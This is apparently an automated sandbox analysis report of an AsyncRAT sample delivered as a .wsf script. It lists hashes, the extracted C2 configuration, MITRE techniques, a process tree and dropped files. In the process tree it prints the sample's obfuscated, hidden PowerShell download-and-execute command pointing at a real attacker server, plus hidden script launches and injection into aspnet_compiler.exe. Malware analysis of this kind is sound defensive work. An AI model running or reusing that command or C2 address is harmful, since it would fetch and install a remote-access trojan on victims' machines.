asyncrat | 4679cbf91c459006b2b61a1fcdad2fe872be6bb0177e703ff9324c3ff75875bf

Analysis

max time kernel
141s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28/01/2025, 12:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4679cbf91c459006b2b61a1fcdad2fe872be6bb0177e703ff9324c3ff75875bf.wsf
Size

210KB
MD5

d282ee245b417b8864b9a1d090b0a3b8
SHA1

b529d5b75920ef439ba509fddeb03049976414f4
SHA256

4679cbf91c459006b2b61a1fcdad2fe872be6bb0177e703ff9324c3ff75875bf
SHA512

f94b5c7e3c8b420248d39f2c86b8c3835ea048aaf2e3181802b366a1f17ae1d364fa2d727931f6af88ae46f721bea8ebdad4c939dbbe7917518f74f158a93030
SSDEEP

6144:rUFHpUFHpUFHpUFHpUFHpUFHpUFHqUFHpUFHpUFHrUFHpUFHpUFHpUFHB:rUnUnUnUnUnUnUkUnUnUlUnUnUnUT

Score

10^/10

asyncrat 00000001 discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

00000001

81.10.39.58:7077

Mutex

AsyncMutex_alosh

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
1	2368	WScript.exe
15	1296	powershell.exe
24	1296	powershell.exe
26	1296	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1296	powershell.exe
1456	powershell.exe
2372	powershell.exe
4904	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
23	api.ipify.org
24	api.ipify.org

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1456 set thread context of 1520	1456	powershell.exe	93
PID 2372 set thread context of 4360	2372	powershell.exe	107
PID 4904 set thread context of 2024	4904	powershell.exe	117

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
1296	powershell.exe
1296	powershell.exe
1456	powershell.exe
1456	powershell.exe
1456	powershell.exe
1456	powershell.exe
1520	aspnet_compiler.exe
2372	powershell.exe
2372	powershell.exe
4904	powershell.exe
4904	powershell.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeIncreaseQuotaPrivilege	1296	powershell.exe
Token: SeSecurityPrivilege	1296	powershell.exe
Token: SeTakeOwnershipPrivilege	1296	powershell.exe
Token: SeLoadDriverPrivilege	1296	powershell.exe
Token: SeSystemProfilePrivilege	1296	powershell.exe
Token: SeSystemtimePrivilege	1296	powershell.exe
Token: SeProfSingleProcessPrivilege	1296	powershell.exe
Token: SeIncBasePriorityPrivilege	1296	powershell.exe
Token: SeCreatePagefilePrivilege	1296	powershell.exe
Token: SeBackupPrivilege	1296	powershell.exe
Token: SeRestorePrivilege	1296	powershell.exe
Token: SeShutdownPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeSystemEnvironmentPrivilege	1296	powershell.exe
Token: SeRemoteShutdownPrivilege	1296	powershell.exe
Token: SeUndockPrivilege	1296	powershell.exe
Token: SeManageVolumePrivilege	1296	powershell.exe
Token: 33	1296	powershell.exe
Token: 34	1296	powershell.exe
Token: 35	1296	powershell.exe
Token: 36	1296	powershell.exe
Token: SeIncreaseQuotaPrivilege	1296	powershell.exe
Token: SeSecurityPrivilege	1296	powershell.exe
Token: SeTakeOwnershipPrivilege	1296	powershell.exe
Token: SeLoadDriverPrivilege	1296	powershell.exe
Token: SeSystemProfilePrivilege	1296	powershell.exe
Token: SeSystemtimePrivilege	1296	powershell.exe
Token: SeProfSingleProcessPrivilege	1296	powershell.exe
Token: SeIncBasePriorityPrivilege	1296	powershell.exe
Token: SeCreatePagefilePrivilege	1296	powershell.exe
Token: SeBackupPrivilege	1296	powershell.exe
Token: SeRestorePrivilege	1296	powershell.exe
Token: SeShutdownPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeSystemEnvironmentPrivilege	1296	powershell.exe
Token: SeRemoteShutdownPrivilege	1296	powershell.exe
Token: SeUndockPrivilege	1296	powershell.exe
Token: SeManageVolumePrivilege	1296	powershell.exe
Token: 33	1296	powershell.exe
Token: 34	1296	powershell.exe
Token: 35	1296	powershell.exe
Token: 36	1296	powershell.exe
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	1520	aspnet_compiler.exe
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeDebugPrivilege	4904	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1520	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 53 IoCs

description	pid	Process	procid_target
PID 2368 wrote to memory of 1296	2368	WScript.exe	82
PID 2368 wrote to memory of 1296	2368	WScript.exe	82
PID 1408 wrote to memory of 1304	1408	WScript.exe	86
PID 1408 wrote to memory of 1304	1408	WScript.exe	86
PID 1304 wrote to memory of 3408	1304	net.exe	88
PID 1304 wrote to memory of 3408	1304	net.exe	88
PID 1408 wrote to memory of 4816	1408	WScript.exe	89
PID 1408 wrote to memory of 4816	1408	WScript.exe	89
PID 4816 wrote to memory of 1456	4816	cmd.exe	91
PID 4816 wrote to memory of 1456	4816	cmd.exe	91
PID 1456 wrote to memory of 4380	1456	powershell.exe	92
PID 1456 wrote to memory of 4380	1456	powershell.exe	92
PID 1456 wrote to memory of 4380	1456	powershell.exe	92
PID 1456 wrote to memory of 1520	1456	powershell.exe	93
PID 1456 wrote to memory of 1520	1456	powershell.exe	93
PID 1456 wrote to memory of 1520	1456	powershell.exe	93
PID 1456 wrote to memory of 1520	1456	powershell.exe	93
PID 1456 wrote to memory of 1520	1456	powershell.exe	93
PID 1456 wrote to memory of 1520	1456	powershell.exe	93
PID 1456 wrote to memory of 1520	1456	powershell.exe	93
PID 1456 wrote to memory of 1520	1456	powershell.exe	93
PID 3868 wrote to memory of 1388	3868	WScript.exe	101
PID 3868 wrote to memory of 1388	3868	WScript.exe	101
PID 1388 wrote to memory of 1092	1388	net.exe	103
PID 1388 wrote to memory of 1092	1388	net.exe	103
PID 3868 wrote to memory of 1652	3868	WScript.exe	104
PID 3868 wrote to memory of 1652	3868	WScript.exe	104
PID 1652 wrote to memory of 2372	1652	cmd.exe	106
PID 1652 wrote to memory of 2372	1652	cmd.exe	106
PID 2372 wrote to memory of 4360	2372	powershell.exe	107
PID 2372 wrote to memory of 4360	2372	powershell.exe	107
PID 2372 wrote to memory of 4360	2372	powershell.exe	107
PID 2372 wrote to memory of 4360	2372	powershell.exe	107
PID 2372 wrote to memory of 4360	2372	powershell.exe	107
PID 2372 wrote to memory of 4360	2372	powershell.exe	107
PID 2372 wrote to memory of 4360	2372	powershell.exe	107
PID 2372 wrote to memory of 4360	2372	powershell.exe	107
PID 1328 wrote to memory of 2012	1328	WScript.exe	111
PID 1328 wrote to memory of 2012	1328	WScript.exe	111
PID 2012 wrote to memory of 2988	2012	net.exe	113
PID 2012 wrote to memory of 2988	2012	net.exe	113
PID 1328 wrote to memory of 2796	1328	WScript.exe	114
PID 1328 wrote to memory of 2796	1328	WScript.exe	114
PID 2796 wrote to memory of 4904	2796	cmd.exe	116
PID 2796 wrote to memory of 4904	2796	cmd.exe	116
PID 4904 wrote to memory of 2024	4904	powershell.exe	117
PID 4904 wrote to memory of 2024	4904	powershell.exe	117
PID 4904 wrote to memory of 2024	4904	powershell.exe	117
PID 4904 wrote to memory of 2024	4904	powershell.exe	117
PID 4904 wrote to memory of 2024	4904	powershell.exe	117
PID 4904 wrote to memory of 2024	4904	powershell.exe	117
PID 4904 wrote to memory of 2024	4904	powershell.exe	117
PID 4904 wrote to memory of 2024	4904	powershell.exe	117

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4679cbf91c459006b2b61a1fcdad2fe872be6bb0177e703ff9324c3ff75875bf.wsf"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://81.10.39.58:8080/test//Update.php'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1296

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\HRfm4ZsgXh.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1408
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1304
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:3408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\HRfm4ZsgXh.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4816
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\HRfm4ZsgXh.ps1'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1456
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:4380
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1520

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\HRfm4ZsgXh.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3868
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:1092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\HRfm4ZsgXh.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\HRfm4ZsgXh.ps1'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2372
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4360

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\HRfm4ZsgXh.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1328
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\HRfm4ZsgXh.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\HRfm4ZsgXh.ps1'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4904
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7e521614944a4b380196880d6e64c960

SHA1
fd6de407ee23a9adbd73b3cd981d00097b58e4b2

SHA256
a43c1a1768dc9b337b5c7e4bdd0147fdc784067e1b1a731b08dd068b5114e12c

SHA512
0ce7556131a62805c2db2277613e9e29119f275fc453e0d77cfa84c7c934deb6079b0d39aacbedb88497988ec67448a76cbb69d907fd6d5dd6e0cf1e80b4d174

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
99ce36eca53e811df7ec12eafd8b7812

SHA1
be261dde6b51ca0156cb4daa16d1053301ad6059

SHA256
46c2055bb301ccb929b0b7d9b71d3de7ba4e8767d76847d95b014d911ac99f09

SHA512
df60d96f0ffcf104a35e36a28a665d70b75dd927ab9d38767707da4803bc23856f323ae8d3ebfb73e2c8ddb1880696001e38e175bb81db0d2705c7dfd6838326

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rj54hq5j.lzg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Music\HRfm4ZsgXh.bat

Filesize
2KB

MD5
50e0362f8a515c0e963e96d75879a66d

SHA1
59b6444e6f0ba1d1888f25bba6628331ccd2e43a

SHA256
15c186971ed6d006baecb639fb626285d6d2f59be132f3850179a135a0acf9d2

SHA512
7383100c631c4d81e91d31226f3c9ecbac9afa33deb95f56ceef20f27b3fc60137d99502f82d132e0682938eb2891be7e7dd4e7ea4654446894eaee629e8d928

Download Submit
C:\Users\Public\Music\HRfm4ZsgXh.ps1

Filesize
453KB

MD5
6d880c65b9fca0e81ccd25c09df349e4

SHA1
3555428b190e9f3c2104ee9d5d69ec38d4efcede

SHA256
0543617a02c20641a0ad8d9118d9b0928526d87c207c40ff5d2a66d46b5f7c7c

SHA512
e544f6f55aa727570b0c87559f083ae27c4910ff559b9f44017966c98b99966a1d098d36a9666b78e24fb1bf47673687f6200f1328c8af63d5adad17d711fa57

Download Submit
C:\Users\Public\Music\HRfm4ZsgXh.vbs

Filesize
4KB

MD5
196d966ca55a845d4d1f79a325674faf

SHA1
0cdbafaf24782f5f497dd0b6f632997c46e9e93a

SHA256
64b4149ca1a0b08285c6c405667a18572d4435dbc14f2fc0383935e02c39343c

SHA512
54cff5e3fbbf7d9699f630e0b0cc1e0a8ac1d90e9bce34b90e3a60e77befc49a0c2dbe2bbe0e2d7effed0ac3e924a996d0b703daed294ad7bb364e47c589b754

Download Submit
memory/1296-39-0x00007FF8C10F0000-0x00007FF8C1BB1000-memory.dmp

Filesize
10.8MB

Download
memory/1296-50-0x000001FAB4C70000-0x000001FAB5198000-memory.dmp

Filesize
5.2MB

Download
memory/1296-10-0x000001FAB1DA0000-0x000001FAB1DC2000-memory.dmp

Filesize
136KB

Download
memory/1296-38-0x00007FF8C10F3000-0x00007FF8C10F5000-memory.dmp

Filesize
8KB

Download
memory/1296-3-0x00007FF8C10F3000-0x00007FF8C10F5000-memory.dmp

Filesize
8KB

Download
memory/1296-14-0x00007FF8C10F0000-0x00007FF8C1BB1000-memory.dmp

Filesize
10.8MB

Download
memory/1296-54-0x00007FF8C10F0000-0x00007FF8C1BB1000-memory.dmp

Filesize
10.8MB

Download
memory/1296-15-0x00007FF8C10F0000-0x00007FF8C1BB1000-memory.dmp

Filesize
10.8MB

Download
memory/1296-21-0x00007FF8C10F0000-0x00007FF8C1BB1000-memory.dmp

Filesize
10.8MB

Download
memory/1296-47-0x00007FF8C10F0000-0x00007FF8C1BB1000-memory.dmp

Filesize
10.8MB

Download
memory/1296-48-0x000001FAB4570000-0x000001FAB4732000-memory.dmp

Filesize
1.8MB

Download
memory/1296-49-0x00007FF8C10F0000-0x00007FF8C1BB1000-memory.dmp

Filesize
10.8MB

Download
memory/1456-34-0x00000195AA3E0000-0x00000195AA3EC000-memory.dmp

Filesize
48KB

Download
memory/1520-40-0x0000000005690000-0x0000000005C34000-memory.dmp

Filesize
5.6MB

Download
memory/1520-46-0x0000000005FB0000-0x0000000006016000-memory.dmp

Filesize
408KB

Download
memory/1520-45-0x00000000064D0000-0x000000000656C000-memory.dmp

Filesize
624KB

Download
memory/1520-42-0x0000000005460000-0x000000000546A000-memory.dmp

Filesize
40KB

Download
memory/1520-41-0x00000000052C0000-0x0000000005352000-memory.dmp

Filesize
584KB

Download
memory/1520-35-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download